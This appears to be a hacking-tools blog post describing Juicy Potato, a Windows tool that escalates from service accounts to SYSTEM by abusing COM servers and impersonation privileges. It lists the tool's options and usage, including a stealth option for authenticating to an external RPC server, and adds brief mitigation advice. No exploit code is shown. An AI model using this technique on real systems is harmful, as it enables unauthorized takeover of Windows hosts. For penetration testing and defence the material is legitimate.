Kali Linux

Juicy Potato : A Sugared Version Of RottenPotatoNG, With A Bit Of Juice

Juicy Potato is a sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

Summary

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

We decided to weaponize RottenPotatoNGSay hello to Juicy Potato.

For the theory, see Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM and follow the chain of links and references.

We discovered that, other than BITS there are a several COM servers we can abuse. They just need to:

  • be instantiable by the current user, normally a “service user” which has impersonation privileges
  • implement the IMarshal interface
  • run as an elevated user (SYSTEM, Administrator, …)

After some testing we obtained and tested an extensive list of interesting CLSID’s on several Windows versions.

Juicy Details

JuicyPotato allows you to:

  • Target CLSID
    pick any CLSID you want. Here you can find the list organized by OS.
  • COM Listening port
    define COM listening port you prefer (instead of the marshalled hardcoded 6666)
  • COM Listening IP address
    bind the server on any IP
  • Process creation mode
    depending on the impersonated user’s privileges you can choose from:
    • CreateProcessWithToken (needs SeImpersonate)
    • CreateProcessAsUser (needs SeAssignPrimaryToken)
    • both
  • Process to launch
    launch an executable or script if the exploitation succeeds
  • Process Argument
    customize the launched process arguments
  • RPC Server address
    for a stealthy approach you can authenticate to an external RPC server
  • RPC Server port
    useful if you want to authenticate to an external server and firewall is blocking port 135
  • TEST mode
    mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM and prints the user of token. See here for testing

Usage

T:>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both
-p : program to launch
-l : COM server listen port

Optional args:
-m : COM server listen address (default 127.0.0.1)
-a : command line argument to pass to program (default NULL)
-k : RPC server ip address (default 127.0.0.1)
-n : RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token’s user

Example

Final Thoughts

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It’s nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.

Also Read – Dr_Robot : Tool Used To Enumerate The Subdomains Associated With A Company

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

3 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

3 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

5 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

1 week ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago